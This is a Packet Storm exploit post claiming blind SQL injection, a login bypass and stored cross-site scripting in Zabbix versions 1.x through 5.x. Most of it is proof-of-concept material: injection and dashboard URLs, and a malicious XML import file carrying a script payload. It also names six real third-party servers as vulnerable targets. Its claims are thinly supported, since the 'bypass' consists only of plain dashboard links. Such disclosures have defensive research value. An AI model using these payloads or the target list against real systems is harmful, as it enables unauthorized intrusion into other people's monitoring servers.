exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zabbix 5.x SQL Injection / Cross Site Scripting

Zabbix 5.x SQL Injection / Cross Site Scripting
Posted Jul 25, 2021
Authored by Taurus Omar

Zabbix versions 1.x through 5.x suffer from persistent cross site scripting and remote blind SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | bf647ae7e57509e600b3f979c5812067e2640eb2f5161119921047214e00b055

Zabbix 5.x SQL Injection / Cross Site Scripting

Change Mirror Download
# Exploit Title: Zabbix all version  / Multiple Vulnerabilities
# Exploit Author: TaurusOmar
# Twitter:@TaurusOmar
# HomePage:taurusomar.com
# Date: Jul 23th, 2021
# CVSS: 3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
# Version: Zabbix [1.x, 2.x, 3.x, 4,x 5.x]
# Risk: High (9.0)
# Vendor Homepage: https://www.zabbix.com/
# Tested on: Arch Linux
# Greetz: PwnEc

# Software Description:
Zabbix is the ultimate enterprise-level software designed for real-time monitoring of millions of metrics collected from tens of thousands of servers, virtual machines and network devices.
With encryption support it is possible to secure communications between separate Zabbix components (such as Zabbix server, proxies, agents and command-line utilities) using Transport Layer
Security (TLS) protocol v.1.2. Certificate-based and pre-shared key-based encryption is supported. Encryption is optional and configurable for individual components.


# 1.) Vulnerability Description => Blind Sqli (affect all versions):
An error in the application allows executing sql statements blindly
Path: https://domain/zabbix/hostinventoriesoverview.php?sid=[RANDOM_TOKEN]+Blind_Sqli&form_refresh=1&groupid=0&groupby=alias


# 2.) Vulnerability Description => Bypass login (affect all versions):
An error in the security of the form allows the login page to be skipped directly to the administration panel, which allows an attacker to access the entire application,
managing to make queries, edit parameters, among others.

Path: http://domain/zabbix/index.php


Vulnerable Form:
<form method="post" action="index.php" accept-charset="utf-8" aria-label="Sign in">
<ul>
<li><label for="name">Username</label><input type="text" id="name" name="name" value="" maxlength="255" autofocus="autofocus"></li>
<li><label for="password">Password</label><input type="password" id="password" name="password" value="" maxlength="255"></li>
<li><input type="checkbox" id="autologin" name="autologin" value="1" class="checkbox-radio" checked="checked"><label for="autologin"><span></span>Remember me for 30 days</label></li>
<li><button type="submit" id="enter" name="enter" value="Sign in">Sign in</button></li>
<li class="sign-in-txt">or <a href="index.php?enter=guest">sign in as guest</a></li>
</ul>
</form>

Pocs Bypass login - access dashborad:
http://domain/zabbix/zabbix.php?action=dashboard.list
http://doamin/zabbix/zabbix.php?action=problem.view&ddreset=1
http://doamin/zabbix/overview.php?ddreset=1
http://doamin/zabbix/hostinventoriesoverview.php?ddreset=1
http://doamin/zabbix/screenconf.php


# 3.) Vulnerability Description => Stored Cross Site Scripting (affect all versions):
The application allows uploading an xml file which can be modified by the <name> parameter with a load util XSS

Path: https://domain//zabbix/screen.import.php?rules_preset=screen

Malicious File .xml

<?xml version="1.0" encoding="UTF-8"?>
<zabbix_export>
<version>3.4</version>
<date>2021-07-23T20:55:48Z</date>
<screens>
<screen>
<name>a‛%3E%3Cscript%3Ealert(‚123‛)%3C/script%3E</name>
<hsize>1</hsize>
<vsize>2</vsize>
<screen_items>
<screen_item>
<resourcetype>7</resourcetype>
<width>500</width>
<height>100</height>
<x>0</x>
<y>0</y>
<colspan>1</colspan>
<rowspan>1</rowspan>
<elements>0</elements>
<valign>0</valign>
<halign>0</halign>
<style>0</style>
<url/>
<dynamic>0</dynamic>
<sort_triggers>0</sort_triggers>
<resource>0</resource>
<max_columns>3</max_columns>
<application/>
</screen_item>
</screen_items>
</screen>
</screens>
</zabbix_export>


# 4.) Samples web Vulnerabilities whit diferent version:
https://monitoreouio.cntcloud.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://monitoreogye.cntcloud.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://zabbix.iwinds.com.ar/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://www.cse.iitb.ac.in/soumen-pc/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
http://monitor.esprida.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
http://demo-zabbix.racom.eu/zabbix/[bypasslogin][blind_sqli][Stored_Xss]

#######
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's
# responsibility.
#
#######
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close